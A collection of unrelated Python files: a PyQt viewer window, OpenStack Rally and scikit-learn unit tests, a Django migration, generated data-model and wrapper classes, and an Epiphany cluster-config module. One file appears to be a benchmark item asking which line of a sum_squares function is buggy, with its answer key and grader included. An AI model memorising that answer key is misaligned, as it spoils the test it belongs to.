INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
# Initial Author <2018>: Arthur Glowacki
from PyQt5.QtWidgets import QMainWindow, QAction
from StreamViewer import XrfStreamViewer
class MainWindow(QMainWindow):
def __init__(self):
QMainWindow.__init__(self)
action_new_xrf_stream = QAction('New XRF Stream Viewer', self)
fileMenu = self.menuBar().addMenu('&File')
fileMenu.addAction(action_new_xrf_stream)
action_new_xrf_stream.triggered.connect(self.on_new_xrf_stream_widget)
self.resize(1024, 768)
def on_new_xrf_stream_widget(self):
self.xrf_stream_viewer = XrfStreamViewer()
self.xrf_stream_viewer.show()
|
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from rally.plugins.openstack.scenarios.fuel import utils
from tests.unit import test
UTILS = "rally.plugins.openstack.scenarios.fuel.utils."
class ModuleTestCase(test.TestCase):
@mock.patch(UTILS + "six")
@mock.patch(UTILS + "FuelClient", return_value="fuel_client")
def test_fuel(self, mock_fuel_client, mock_six):
mock_six.moves.urllib.parse.urlparse().hostname = "foo_host"
client = utils.Fuel(
mock.Mock(username="foo_user", password="foo_pass"),
{}, {}).create_client()
mock_fuel_client.assert_called_once_with(
version="v1", server_address="foo_host", server_port=8000,
username="foo_user", password="foo_pass")
self.assertEqual("fuel_client", client)
class FuelEnvTestCase(test.TestCase):
def test___init__(self):
env = utils.FuelEnvManager("some_client")
self.assertEqual("some_client", env.client)
def test_get(self):
client = mock.Mock()
fenv = utils.FuelEnvManager(client)
result = fenv.get("some_id")
client.get_by_id.assert_called_once_with("some_id")
self.assertEqual(result, client.get_by_id("some_id"))
client.get_by_id.side_effect = BaseException
self.assertIsNone(fenv.get("some_id"))
def test_list(self):
client = mock.Mock()
envs = [
{"name": "one"},
{"name": "two"},
{"name": "three"}]
client.get_all.return_value = envs
fenv = utils.FuelEnvManager(client)
self.assertEqual(envs, fenv.list())
def test_list_exception(self):
client = mock.Mock()
client.get_all = mock.Mock(side_effect=SystemExit)
fenv = utils.FuelEnvManager(client)
self.assertRaises(RuntimeError, fenv.list)
def test_create(self):
client = mock.Mock()
client.create.return_value = "env"
fenv = utils.FuelEnvManager(client)
kwargs = {"release_id": 42, "network_provider": "testprov",
"deployment_mode": "some_mode", "net_segment_type": "bar"}
self.assertEqual("env", fenv.create("some_env", **kwargs))
client.create.assert_called_once_with("some_env", 42, "testprov",
"some_mode", "bar")
client.create.side_effect = SystemExit
self.assertRaises(RuntimeError, fenv.create, "some_env", **kwargs)
def test_create_env_not_returned(self):
client = mock.Mock()
client.create.return_value = None
kwargs = {"release_id": 42, "network_provider": "testprov",
"deployment_mode": "some_mode", "net_segment_type": "bar"}
fenv = utils.FuelEnvManager(client)
self.assertRaises(RuntimeError, fenv.create, "some_env", **kwargs)
@mock.patch(UTILS + "scenario.OpenStackScenario")
def test_delete(self, mock_open_stack_scenario):
mock_open_stack_scenario.RESOURCE_NAME_PREFIX = ""
envs = [{"id": "some_one", "name": "one"}]
client = mock.Mock()
client.get_all.return_value = envs
client.delete_by_id.side_effect = SystemExit
fenv = utils.FuelEnvManager(client)
self.assertRaises(RuntimeError, fenv.delete, "some_one", retries=2)
self.assertEqual(3, len(client.delete_by_id.mock_calls))
@mock.patch(UTILS + "scenario.OpenStackScenario")
def test_delete_error(self, mock_open_stack_scenario):
mock_open_stack_scenario.RESOURCE_NAME_PREFIX = ""
envs = [{"id": "some_one", "name": "one"}]
client = mock.Mock()
client.delete_by_id.side_effect = SystemExit
client.get_all.return_value = envs
fenv = utils.FuelEnvManager(client)
self.assertRaises(RuntimeError, fenv.delete, "some_one", retries=1)
self.assertEqual(2, len(client.delete_by_id.mock_calls))
class FuelClientTestCase(test.TestCase):
@mock.patch(UTILS + "FuelEnvManager")
@mock.patch(UTILS + "os")
def test___init__(self, mock_os, mock_fuel_env_manager):
mock_os.environ = {}
mock_fuelclient = mock.Mock(get_client=lambda *args, **kw: [args, kw])
with mock.patch.dict("sys.modules", {"fuelclient": mock_fuelclient}):
client = utils.FuelClient(version="foo_version",
server_address="foo_address",
server_port=1234,
username="foo_user",
password="foo_pass")
expected_environ = {"KEYSTONE_PASS": "foo_pass",
"KEYSTONE_USER": "foo_user",
"LISTEN_PORT": "1234",
"SERVER_ADDRESS": "foo_address"}
self.assertEqual(expected_environ, mock_os.environ)
self.assertEqual(mock_fuel_env_manager.return_value,
client.environment)
self.assertEqual([("node",), {"version": "foo_version"}],
client.node)
self.assertEqual([("task",), {"version": "foo_version"}],
client.task)
mock_fuel_env_manager.assert_called_once_with(
[("environment",),
{"version": "foo_version"}])
class FuelScenarioTestCase(test.ScenarioTestCase):
def test__list_environments(self):
scenario = utils.FuelScenario(self.context)
self.assertEqual(
scenario._list_environments(),
self.admin_clients("fuel").environment.list.return_value)
self.admin_clients("fuel").environment.list.assert_called_once_with()
self._test_atomic_action_timer(scenario.atomic_actions(),
"fuel.list_environments")
def test__create_environment(self):
self.admin_clients("fuel").environment.create.return_value = {"id": 42}
fuel_scenario = utils.FuelScenario()
fuel_scenario.admin_clients = self.admin_clients
fuel_scenario.generate_random_name = mock.Mock()
result = fuel_scenario._create_environment()
self.assertEqual(
self.admin_clients("fuel").environment.create.return_value["id"],
result)
tmp_mck = self.admin_clients("fuel").environment.create
tmp_mck.assert_called_once_with(
fuel_scenario.generate_random_name.return_value, 1, "neutron",
"ha_compact", "vlan")
def test__delete_environment(self):
fuel_scenario = utils.FuelScenario()
fuel_scenario.admin_clients = self.admin_clients
fuel_scenario._delete_environment(42, 33)
tmp_mock = fuel_scenario.admin_clients("fuel")
tmp_mock.environment.delete.assert_called_once_with(42, 33)
def test__add_nodes(self):
fscen = utils.FuelScenario()
fscen.admin_clients = mock.Mock()
fscen._add_node("1", ["42"], node_roles=["some_role"])
tmp_mock = fscen.admin_clients.return_value.environment.client
tmp_mock.add_nodes.assert_called_once_with("1", ["42"], ["some_role"])
def test__add_nodes_error(self):
fscen = utils.FuelScenario()
fscen.admin_clients = mock.Mock()
tmp_mock = fscen.admin_clients.return_value.environment.client
tmp_mock.add_nodes.side_effect = BaseException
self.assertRaises(RuntimeError, fscen._add_node, "1", "42",
node_roles="some_role")
@mock.patch(UTILS + "FuelClient")
def test__remove_nodes(self, mock_fuel_client):
mock_tmp = mock_fuel_client.fuelclient_module.objects
mock_env = mock_tmp.environment.Environment
mock_env.return_value = mock.Mock()
fscen = utils.FuelScenario()
fscen._remove_node("1", "2")
mock_env.assert_called_once_with("1")
mock_env.return_value.unassign.assert_called_once_with(["2"])
@mock.patch(UTILS + "FuelClient")
def test__remove_nodes_error(self, mock_fuel_client):
mock_tmp = mock_fuel_client.fuelclient_module.objects
mock_env = mock_tmp.environment.Environment
mock_env.return_value = mock.Mock()
mock_env.return_value.unassign.side_effect = BaseException
fscen = utils.FuelScenario()
self.assertRaises(RuntimeError, fscen._remove_node, "1", "2")
def test__list_node_ids(self):
fscen = utils.FuelScenario()
fscen.admin_clients = mock.Mock()
fscen.admin_clients.return_value.node.get_all.return_value = [
{"id": "id1"}, {"id": "id2"}]
res = fscen._list_node_ids("env")
self.assertEqual(["id1", "id2"], res)
tmp_mock = fscen.admin_clients.return_value.node.get_all
tmp_mock.assert_called_once_with(environment_id="env")
def test__node_is_assigned(self):
fscen = utils.FuelScenario()
fscen.admin_clients = mock.Mock()
fscen.admin_clients.return_value.node.get_by_id.return_value = {
"id": "id1", "cluster": "some_id"}
self.assertTrue(fscen._node_is_assigned("id1"))
fscen.admin_clients.return_value.node.get_by_id.return_value[
"cluster"] = ""
self.assertFalse(fscen._node_is_assigned("id2"))
@mock.patch(UTILS + "FuelScenario._node_is_assigned", return_value=False)
@mock.patch(UTILS + "FuelScenario._list_node_ids",
return_value=["id1", "id2"])
def test__get_free_node_id(self, mock__list_node_ids,
mock__node_is_assigned):
node_id = utils.FuelScenario()._get_free_node_id()
self.assertIn(node_id, mock__list_node_ids.return_value)
@mock.patch(UTILS + "FuelScenario._node_is_assigned", return_value=True)
@mock.patch(UTILS + "FuelScenario._list_node_ids",
return_value=["id1", "id2"])
def test__get_free_node_id_exception(self, mock__list_node_ids,
mock__node_is_assigned):
self.assertRaises(RuntimeError,
utils.FuelScenario()._get_free_node_id)
|
def sum_squares(lst):
""""
This function will take a list of integers. For all entries in the list, the function shall square the integer entry if its index is a
multiple of 3 and will cube the integer entry if its index is a multiple of 4 and not a multiple of 3. The function will not
change the entries in the list whose indexes are not a multiple of 3 or 4. The function shall then return the sum of all entries.
Examples:
For lst = [1,2,3] the output should be 6
For lst = [] the output should be 0
For lst = [-1,-5,2,-1,-5] the output should be -126
Example solution:
# line 1
result =[]
# line 2
for i in range(len(lst)):
# line 3
if i %3 == 0:
# line 4
result.append(lst[i]**2)
# line 5
elif i % 4 == 0 and i%3 == 0:
# line 6
result.append(lst[i]**3)
# line 7
else:
# line 8
result.append(lst[i])
# line 9
return sum(result)
"""
# Please print out which line of the above program contains an error. E.g. if the bug is on line 4 then print 4
# END OF CONTEXT
print("5")
# END OF SOLUTION
def check(candidate):
import io
from contextlib import redirect_stdout
f = io.StringIO()
with redirect_stdout(f):
candidate([])
out = f.getvalue().strip('\n')
assert "5" == out
for i in range(0, 10):
if i != 5:
assert str(i) != out
if __name__ == '__main__':
check(sum_squares)
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('billing', '0012_product_is_food'),
('billing', '0015_merge'),
]
operations = [
]
|
from typing import Any, Dict, List, Type, TypeVar, Union
import attr
from ..models.generated import Generated
from ..types import UNSET, Unset
T = TypeVar("T", bound="CredDefValuePrimary")
@attr.s(auto_attribs=True)
class CredDefValuePrimary:
""" """
n: Union[Unset, str] = UNSET
r: Union[Unset, Generated] = UNSET
rctxt: Union[Unset, str] = UNSET
s: Union[Unset, str] = UNSET
z: Union[Unset, str] = UNSET
additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)
def to_dict(self) -> Dict[str, Any]:
n = self.n
r: Union[Unset, Dict[str, Any]] = UNSET
if not isinstance(self.r, Unset):
r = self.r.to_dict()
rctxt = self.rctxt
s = self.s
z = self.z
field_dict: Dict[str, Any] = {}
field_dict.update(self.additional_properties)
field_dict.update({})
if n is not UNSET:
field_dict["n"] = n
if r is not UNSET:
field_dict["r"] = r
if rctxt is not UNSET:
field_dict["rctxt"] = rctxt
if s is not UNSET:
field_dict["s"] = s
if z is not UNSET:
field_dict["z"] = z
return field_dict
@classmethod
def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:
d = src_dict.copy()
n = d.pop("n", UNSET)
_r = d.pop("r", UNSET)
r: Union[Unset, Generated]
if isinstance(_r, Unset):
r = UNSET
else:
r = Generated.from_dict(_r)
rctxt = d.pop("rctxt", UNSET)
s = d.pop("s", UNSET)
z = d.pop("z", UNSET)
cred_def_value_primary = cls(
n=n,
r=r,
rctxt=rctxt,
s=s,
z=z,
)
cred_def_value_primary.additional_properties = d
return cred_def_value_primary
@property
def additional_keys(self) -> List[str]:
return list(self.additional_properties.keys())
def __getitem__(self, key: str) -> Any:
return self.additional_properties[key]
def __setitem__(self, key: str, value: Any) -> None:
self.additional_properties[key] = value
def __delitem__(self, key: str) -> None:
del self.additional_properties[key]
def __contains__(self, key: str) -> bool:
return key in self.additional_properties
|
from __future__ import annotations
from fisher_py.net_wrapping import NetWrapperBase, ThermoFisher
from typing import List
from fisher_py.data.business import Range, TraceType
from fisher_py.utils import to_net_list
class ChromatogramTraceSettings(NetWrapperBase):
"""
Setting to define a chromatogram Trace.
"""
_wrapped_type = ThermoFisher.CommonCore.Data.Business.ChromatogramTraceSettings
def __init__(self, *args):
super().__init__()
if len(args) == 0:
self._wrapped_object = self._wrapped_type()
elif len(args) == 1:
arg = args[0]
if type(arg) is ChromatogramTraceSettings:
self._wrapped_object = self._wrapped_type(arg._get_wrapped_object_())
elif type(arg) is TraceType:
self._wrapped_object = self._wrapped_type(arg.value)
else:
raise ValueError('Unable to create chromatogram trace settings')
elif len(args) == 2:
filter_, range_ = args
assert type(filter_) is str
assert type(range_) is Range
self._wrapped_object = self._wrapped_type(filter_, range_._get_wrapped_object_())
@property
def mass_range_count(self) -> int:
"""
Gets or sets the number of mass ranges, or wavelength ranges for PDA.
Value:
Numeric count of mass ranges
Remarks:
If ThermoFisher.CommonCore.Data.Business.ChromatogramTraceSettings.Trace is MassRange
then mass range values are used to build trace.
"""
return self._get_wrapped_object_().MassRangeCount
@mass_range_count.setter
def mass_range_count(self, value: int):
"""
Gets or sets the number of mass ranges, or wavelength ranges for PDA.
Value:
Numeric count of mass ranges
Remarks:
If ThermoFisher.CommonCore.Data.Business.ChromatogramTraceSettings.Trace is MassRange
then mass range values are used to build trace.
"""
assert type(value) is int
self._get_wrapped_object_().MassRangeCount = value
@property
def include_reference(self) -> bool:
"""
Gets or sets a value indicating whether reference and exception peaks are included
in this chromatogram trace
"""
return self._get_wrapped_object_().IncludeReference
@include_reference.setter
def include_reference(self, value: bool):
"""
Gets or sets a value indicating whether reference and exception peaks are included
in this chromatogram trace
"""
assert type(value) is bool
self._get_wrapped_object_().IncludeReference = value
@property
def fragment_mass(self) -> float:
"""
Gets or sets the fragment mass for neutral fragment filters.
Value:
Floating point fragment mass for neutral fragment filters
"""
return self._get_wrapped_object_().FragmentMass
@fragment_mass.setter
def fragment_mass(self, value: float):
"""
Gets or sets the fragment mass for neutral fragment filters.
Value:
Floating point fragment mass for neutral fragment filters
"""
assert type(value) is float
self._get_wrapped_object_().FragmentMass = value
@property
def filter(self) -> str:
"""
Gets or sets the filter used in searching scans during trace build
"""
return self._get_wrapped_object_().Filter
@filter.setter
def filter(self, value: str):
"""
Gets or sets the filter used in searching scans during trace build
"""
assert type(value) is str
self._get_wrapped_object_().Filter = value
@property
def delay_in_min(self) -> float:
"""
Gets or sets the delay in minutes.
Value:
Floating point delay in minutes
"""
return self._get_wrapped_object_().DelayInMin
@delay_in_min.setter
def delay_in_min(self, value: float):
"""
Gets or sets the delay in minutes.
Value:
Floating point delay in minutes
"""
assert type(value) is float
self._get_wrapped_object_().DelayInMin = value
@property
def trace(self) -> TraceType:
"""
Gets or sets the type of trace to construct
Value:
see ThermoFisher.CommonCore.Data.Business.TraceType for more details
"""
return TraceType(self._get_wrapped_object_().Trace)
@trace.setter
def trace(self, value: TraceType):
"""
Gets or sets the type of trace to construct
Value:
see ThermoFisher.CommonCore.Data.Business.TraceType for more details
"""
assert type(value) is TraceType
self._get_wrapped_object_().Trace = value.value
@property
def mass_ranges(self) -> List[Range]:
"""
Gets or sets the mass ranges.
Value:
Array of mass ranges
Remarks:
If ThermoFisher.CommonCore.Data.Business.ChromatogramTraceSettings.Trace is MassRange
then mass range values are used to build trace.
"""
return [Range._get_wrapper_(r) for r in self._get_wrapped_object_().MassRanges]
@mass_ranges.setter
def mass_ranges(self, value: List[Range]):
"""
Gets or sets the mass ranges.
Value:
Array of mass ranges
Remarks:
If ThermoFisher.CommonCore.Data.Business.ChromatogramTraceSettings.Trace is MassRange
then mass range values are used to build trace.
"""
assert type(value) is list
#value = to_net_list([r._get_wrapped_object_() for r in value], Range._wrapped_type)
value = [r._get_wrapped_object_() for r in value]
self._get_wrapped_object_().MassRanges = value
@property
def compound_names(self) -> List[str]:
"""
Gets or sets the compound names.
"""
return self._get_wrapped_object_().CompoundNames
@compound_names.setter
def compound_names(self, value: List[str]):
"""
Gets or sets the compound names.
"""
assert type(value) is list
value = to_net_list(value, str)
self._get_wrapped_object_().CompoundNames = value
def clone(self) -> ChromatogramTraceSettings:
"""
Copies all of the items to from this object into the returned object.
Returns:
The clone.
"""
return ChromatogramTraceSettings._get_wrapper_(self._get_wrapped_object().Clone())
def get_mass_range(self, index: int) -> Range:
"""
Gets a range value at 0-based index.
Parameters:
index:
Index at which to retrieve the range
Returns:
ThermoFisher.CommonCore.Data.Business.Range value at give index
Remarks:
Use ThermoFisher.CommonCore.Data.Business.ChromatogramTraceSettings.MassRangeCount
to find out the count of mass ranges.
If ThermoFisher.CommonCore.Data.Business.ChromatogramTraceSettings.Trace is MassRange
then mass range values are used to build trace.
"""
assert type(index) is int
return Range._get_wrapper_(self._get_wrapped_object().GetMassRange(index))
def set_mass_range(self, index: int, range: Range):
"""
Sets a range value at 0-based index.
Parameters:
index:
Index at which new range value is to be set
range:
New ThermoFisher.CommonCore.Data.Business.Range value to be set
Remarks:
Set count of mass ranges using ThermoFisher.CommonCore.Data.Business.ChromatogramTraceSettings.MassRangeCount
before setting any mass ranges.
If ThermoFisher.CommonCore.Data.Business.ChromatogramTraceSettings.Trace is MassRange
then mass range values are used to build trace.
"""
assert type(index) is int
assert type(range) is Range
self._get_wrapped_object().SetMassRange(index, range._get_wrapped_object_())
|
import pytest
import numpy as np
from numpy.testing import assert_allclose
from sklearn.compose import ColumnTransformer
from sklearn.datasets import load_boston
from sklearn.datasets import load_iris
from sklearn.datasets import make_classification
from sklearn.datasets import make_regression
from sklearn.dummy import DummyClassifier
from sklearn.ensemble import RandomForestRegressor
from sklearn.ensemble import RandomForestClassifier
from sklearn.linear_model import LinearRegression
from sklearn.linear_model import LogisticRegression
from sklearn.impute import SimpleImputer
from sklearn.inspection import permutation_importance
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import KBinsDiscretizer
from sklearn.preprocessing import OneHotEncoder
from sklearn.preprocessing import StandardScaler
from sklearn.preprocessing import scale
from sklearn.utils import parallel_backend
from sklearn.utils._testing import _convert_container
@pytest.mark.parametrize("n_jobs", [1, 2])
def test_permutation_importance_correlated_feature_regression(n_jobs):
# Make sure that feature highly correlated to the target have a higher
# importance
rng = np.random.RandomState(42)
n_repeats = 5
X, y = load_boston(return_X_y=True)
y_with_little_noise = (
y + rng.normal(scale=0.001, size=y.shape[0])).reshape(-1, 1)
X = np.hstack([X, y_with_little_noise])
clf = RandomForestRegressor(n_estimators=10, random_state=42)
clf.fit(X, y)
result = permutation_importance(clf, X, y, n_repeats=n_repeats,
random_state=rng, n_jobs=n_jobs)
assert result.importances.shape == (X.shape[1], n_repeats)
# the correlated feature with y was added as the last column and should
# have the highest importance
assert np.all(result.importances_mean[-1] >
result.importances_mean[:-1])
@pytest.mark.parametrize("n_jobs", [1, 2])
def test_permutation_importance_correlated_feature_regression_pandas(n_jobs):
pd = pytest.importorskip("pandas")
# Make sure that feature highly correlated to the target have a higher
# importance
rng = np.random.RandomState(42)
n_repeats = 5
dataset = load_iris()
X, y = dataset.data, dataset.target
y_with_little_noise = (
y + rng.normal(scale=0.001, size=y.shape[0])).reshape(-1, 1)
# Adds feature correlated with y as the last column
X = pd.DataFrame(X, columns=dataset.feature_names)
X['correlated_feature'] = y_with_little_noise
clf = RandomForestClassifier(n_estimators=10, random_state=42)
clf.fit(X, y)
result = permutation_importance(clf, X, y, n_repeats=n_repeats,
random_state=rng, n_jobs=n_jobs)
assert result.importances.shape == (X.shape[1], n_repeats)
# the correlated feature with y was added as the last column and should
# have the highest importance
assert np.all(result.importances_mean[-1] > result.importances_mean[:-1])
def test_permutation_importance_mixed_types():
rng = np.random.RandomState(42)
n_repeats = 4
# Last column is correlated with y
X = np.array([[1.0, 2.0, 3.0, np.nan], [2, 1, 2, 1]]).T
y = np.array([0, 1, 0, 1])
clf = make_pipeline(SimpleImputer(), LogisticRegression(solver='lbfgs'))
clf.fit(X, y)
result = permutation_importance(clf, X, y, n_repeats=n_repeats,
random_state=rng)
assert result.importances.shape == (X.shape[1], n_repeats)
# the correlated feature with y is the last column and should
# have the highest importance
assert np.all(result.importances_mean[-1] > result.importances_mean[:-1])
# use another random state
rng = np.random.RandomState(0)
result2 = permutation_importance(clf, X, y, n_repeats=n_repeats,
random_state=rng)
assert result2.importances.shape == (X.shape[1], n_repeats)
assert not np.allclose(result.importances, result2.importances)
# the correlated feature with y is the last column and should
# have the highest importance
assert np.all(result2.importances_mean[-1] > result2.importances_mean[:-1])
def test_permutation_importance_mixed_types_pandas():
pd = pytest.importorskip("pandas")
rng = np.random.RandomState(42)
n_repeats = 5
# Last column is correlated with y
X = pd.DataFrame({'col1': [1.0, 2.0, 3.0, np.nan],
'col2': ['a', 'b', 'a', 'b']})
y = np.array([0, 1, 0, 1])
num_preprocess = make_pipeline(SimpleImputer(), StandardScaler())
preprocess = ColumnTransformer([
('num', num_preprocess, ['col1']),
('cat', OneHotEncoder(), ['col2'])
])
clf = make_pipeline(preprocess, LogisticRegression(solver='lbfgs'))
clf.fit(X, y)
result = permutation_importance(clf, X, y, n_repeats=n_repeats,
random_state=rng)
assert result.importances.shape == (X.shape[1], n_repeats)
# the correlated feature with y is the last column and should
# have the highest importance
assert np.all(result.importances_mean[-1] > result.importances_mean[:-1])
def test_permutation_importance_linear_regresssion():
X, y = make_regression(n_samples=500, n_features=10, random_state=0)
X = scale(X)
y = scale(y)
lr = LinearRegression().fit(X, y)
# this relationship can be computed in closed form
expected_importances = 2 * lr.coef_**2
results = permutation_importance(lr, X, y,
n_repeats=50,
scoring='neg_mean_squared_error')
assert_allclose(expected_importances, results.importances_mean,
rtol=1e-1, atol=1e-6)
def test_permutation_importance_equivalence_sequential_parallel():
# regression test to make sure that sequential and parallel calls will
# output the same results.
X, y = make_regression(n_samples=500, n_features=10, random_state=0)
lr = LinearRegression().fit(X, y)
importance_sequential = permutation_importance(
lr, X, y, n_repeats=5, random_state=0, n_jobs=1
)
# First check that the problem is structured enough and that the model is
# complex enough to not yield trivial, constant importances:
imp_min = importance_sequential['importances'].min()
imp_max = importance_sequential['importances'].max()
assert imp_max - imp_min > 0.3
# The actually check that parallelism does not impact the results
# either with shared memory (threading) or without isolated memory
# via process-based parallelism using the default backend
# ('loky' or 'multiprocessing') depending on the joblib version:
# process-based parallelism (by default):
importance_processes = permutation_importance(
lr, X, y, n_repeats=5, random_state=0, n_jobs=2)
assert_allclose(
importance_processes['importances'],
importance_sequential['importances']
)
# thread-based parallelism:
with parallel_backend("threading"):
importance_threading = permutation_importance(
lr, X, y, n_repeats=5, random_state=0, n_jobs=2
)
assert_allclose(
importance_threading['importances'],
importance_sequential['importances']
)
@pytest.mark.parametrize("n_jobs", [None, 1, 2])
def test_permutation_importance_equivalence_array_dataframe(n_jobs):
# This test checks that the column shuffling logic has the same behavior
# both a dataframe and a simple numpy array.
pd = pytest.importorskip('pandas')
# regression test to make sure that sequential and parallel calls will
# output the same results.
X, y = make_regression(n_samples=100, n_features=5, random_state=0)
X_df = pd.DataFrame(X)
# Add a categorical feature that is statistically linked to y:
binner = KBinsDiscretizer(n_bins=3, encode="ordinal")
cat_column = binner.fit_transform(y.reshape(-1, 1))
# Concatenate the extra column to the numpy array: integers will be
# cast to float values
X = np.hstack([X, cat_column])
assert X.dtype.kind == "f"
# Insert extra column as a non-numpy-native dtype (while keeping backward
# compat for old pandas versions):
if hasattr(pd, "Categorical"):
cat_column = pd.Categorical(cat_column.ravel())
else:
cat_column = cat_column.ravel()
new_col_idx = len(X_df.columns)
X_df[new_col_idx] = cat_column
assert X_df[new_col_idx].dtype == cat_column.dtype
# Stich an aribtrary index to the dataframe:
X_df.index = np.arange(len(X_df)).astype(str)
rf = RandomForestRegressor(n_estimators=5, max_depth=3, random_state=0)
rf.fit(X, y)
n_repeats = 3
importance_array = permutation_importance(
rf, X, y, n_repeats=n_repeats, random_state=0, n_jobs=n_jobs
)
# First check that the problem is structured enough and that the model is
# complex enough to not yield trivial, constant importances:
imp_min = importance_array['importances'].min()
imp_max = importance_array['importances'].max()
assert imp_max - imp_min > 0.3
# Now check that importances computed on dataframe matche the values
# of those computed on the array with the same data.
importance_dataframe = permutation_importance(
rf, X_df, y, n_repeats=n_repeats, random_state=0, n_jobs=n_jobs
)
assert_allclose(
importance_array['importances'],
importance_dataframe['importances']
)
@pytest.mark.parametrize("input_type", ["array", "dataframe"])
def test_permutation_importance_large_memmaped_data(input_type):
# Smoke, non-regression test for:
# https://github.com/scikit-learn/scikit-learn/issues/15810
n_samples, n_features = int(5e4), 4
X, y = make_classification(n_samples=n_samples, n_features=n_features,
random_state=0)
assert X.nbytes > 1e6 # trigger joblib memmaping
X = _convert_container(X, input_type)
clf = DummyClassifier(strategy='prior').fit(X, y)
# Actual smoke test: should not raise any error:
n_repeats = 5
r = permutation_importance(clf, X, y, n_repeats=n_repeats, n_jobs=2)
# Auxiliary check: DummyClassifier is feature independent:
# permutating feature should not change the predictions
expected_importances = np.zeros((n_features, n_repeats))
assert_allclose(expected_importances, r.importances)
|
"""Implementation of the "init" method."""
import sys
from ._helpers import (get_path, combine, dictify, undictify,
load_yaml, dump_yaml, dump_yaml_into_str, to_literal_scalar)
# The standard "minimal-cluster-config.yml" is not used here because
# it contains too many extra documents
MINIMAL_EPIPHANY_CLUSTER = '''
kind: epiphany-cluster
title: Epiphany cluster Config
name: TO_BE_SET
provider: any
specification:
name: TO_BE_SET
admin_user:
name: operations
key_path: TO_BE_SET
cloud:
k8s_as_cloud_service: true
components:
repository:
count: 1
kubernetes_master:
count: 0
kubernetes_node:
count: 0
logging:
count: 0
monitoring:
count: 0
kafka:
count: 0
postgresql:
count: 1
load_balancer:
count: 0
rabbitmq:
count: 0
'''
# Extend feature mapping of repository to enable applications
MINIMAL_FEATURE_MAPPING = '''
kind: configuration/feature-mapping
title: Feature mapping to roles
name: TO_BE_SET
provider: any
specification:
roles_mapping:
repository:
- repository
- image-registry
- firewall
- filebeat
- node-exporter
- applications
'''
# Original one seems to be incorrect:
# https://github.com/epiphany-platform/epiphany/issues/1743
VIRTUAL_MACHINE_TEMPLATE = '''
kind: infrastructure/machine
name: TO_BE_SET
provider: any
specification:
hostname: TO_BE_SET
ip: TO_BE_SET
'''
INITIAL_MODULE_STATE = '''
kind: state
{M_MODULE_SHORT}:
status: initialized
'''
INITIAL_MODULE_CONFIG = '''
kind: {M_MODULE_SHORT}-config
{M_MODULE_SHORT}:
vault_password: "asd"
'''
def _get_enabled_components(cluster):
"""Get all components with non-zero "count"."""
return [
(key, value)
for key, value in cluster["specification"]["components"].items()
if int(value["count"]) > 0
]
def _get_dummy_machines(cluster):
"""Generate dummy virtual machine documents."""
count = sum(
value["count"]
for _, value in _get_enabled_components(cluster)
)
return [
combine(load_yaml(VIRTUAL_MACHINE_TEMPLATE), {
"name": "default-vm-" + str(index + 1),
})
for index in range(count)
]
def _process_cluster(v):
"""Process the main cluster document."""
return combine(load_yaml(MINIMAL_EPIPHANY_CLUSTER), {
"name": v["M_MODULE_SHORT"],
"provider": "any",
"specification": {
"name": v["M_MODULE_SHORT"],
"admin_user": {
"key_path": str(v["shared_dir"] / v["VMS_RSA_FILENAME"]),
},
},
})
def _process_feature_mapping(v):
"""Process feature mapping (enable applications)."""
return combine(load_yaml(MINIMAL_FEATURE_MAPPING), {
"name": v["M_MODULE_SHORT"],
"provider": "any",
})
def _process_machines(v, cluster):
"""Process virtual machines."""
def read_vms_from_state_file():
state = load_yaml(v["state_file"])["azbi"]
output = state["output"]
vm_names = output["vm_names.value"]
if state["use_public_ip"]:
vm_ips = output["public_ips.value"]
else:
vm_ips = output["private_ips.value"]
return zip(vm_names, vm_ips)
def derive_machines(vms):
return [
combine(load_yaml(VIRTUAL_MACHINE_TEMPLATE), {
"name": "default-" + vm_name,
"provider": "any",
"specification": {
"hostname": vm_name,
"ip": vm_ip,
},
})
for vm_name, vm_ip in vms
]
def assign_machines_to_components(machines, cluster):
number_of_required_vms = sum(
int(value["count"])
for _, value in _get_enabled_components(cluster)
)
if number_of_required_vms > len(machines):
raise Exception("not enough vms available")
# Convert virtual machine list to iterator
machines = iter(machines)
return combine(cluster, {
"specification": {
"components": {
key: {
"machines": [
next(machines)["name"]
for _ in range(int(value["count"]))
],
}
for key, value in _get_enabled_components(cluster)
},
},
})
try:
# Read data from the state file
vms = read_vms_from_state_file()
machines = derive_machines(vms)
except (FileNotFoundError, KeyError):
# Fallback to dummy values if there is no state to read
vms = []
machines = _get_dummy_machines(cluster)
cluster = assign_machines_to_components(machines, cluster)
return machines, cluster
def _process_components(v, cluster):
"""Process component defaults."""
return [
combine(load_yaml(v["template_dir"] / "configuration" / (key + ".yml")), {
"provider": "any",
})
for key, _ in _get_enabled_components(cluster)
]
def _process_applications(v):
"""Process application defaults."""
template = load_yaml(
v["template_dir"] / "configuration" / "applications.yml")
# Add provider key
document = combine(template, {
"provider": "any",
})
# Convert list-based dictionary to real one (makes merging possible)
applications = dictify(
document["specification"]["applications"])
# Make sure user gets defaults appropriate for cloud Kuberentes
applications = combine(applications, {
key: {
"use_local_image_registry": False,
}
for key, value in applications.items()
if "use_local_image_registry" in value
})
return combine(document, {
"specification": {
# Convert-back to list-based dictionary
"applications": undictify(applications),
},
})
def _update_state_file(v):
"""Add module's state to the state file."""
try:
state = load_yaml(v["state_file"])
except FileNotFoundError:
state = {}
state = combine(state, load_yaml(INITIAL_MODULE_STATE.format(**v).strip()))
